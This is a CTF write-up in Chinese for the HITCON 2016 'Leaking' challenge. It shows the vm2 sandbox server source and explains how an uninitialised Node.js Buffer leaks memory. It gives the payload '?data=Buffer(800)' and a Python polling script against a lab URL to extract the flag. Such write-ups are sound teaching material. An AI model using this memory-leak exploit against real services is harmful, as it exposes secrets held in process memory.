[HITCON 2016]Leaking

[HITCON 2016]Leaking

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});

app.listen(3000, function() {
    console.log("listening on port 3000!");
});
  • 根据题目这是一个vm2逃逸
  • 主要看这里
eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
  • 这里调用了flag,证明flag会存在于缓存区里面,我们就可以使用Buffer()获取缓冲区的内容从而得到flag

Buffer()

[[沙盒逃逸#Buffer]]

  • 在较早一点的node.js版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。
    注:关于 Buffer
  • JavaScript 语言自身只有字符串数据类型,没有二进制数据类型。
  • 但在处理像TCP流或文件流时,必须使用到二进制数据。因此在 Node.js中,定义了一个 Buffer 类,该类用来创建一个专门存放二进制数据的缓存区。
  • 只要是调用过的变量,一定会存在内存中,所以可以使用Buffer()来读取内存,获取之前调用过的变了数据,比如flag
    payload
    ?data=Buffer(800)
    读取一次可能读取不到缓存区的flag
    使用脚本
import requests
import time
url="http://a40b5f99-b58f-4d21-b1e9-fcaadab56dd0.node5.buuoj.cn:81/?data=Buffer(800)"
while True:
    time.sleep(0.1)
    r=requests.get(url=url)
    if "flag{" in r.text:
        print(r.text)
        break
    else:
        print(r.status_code)

你可能感兴趣的:(ctf,web安全,笔记,题解)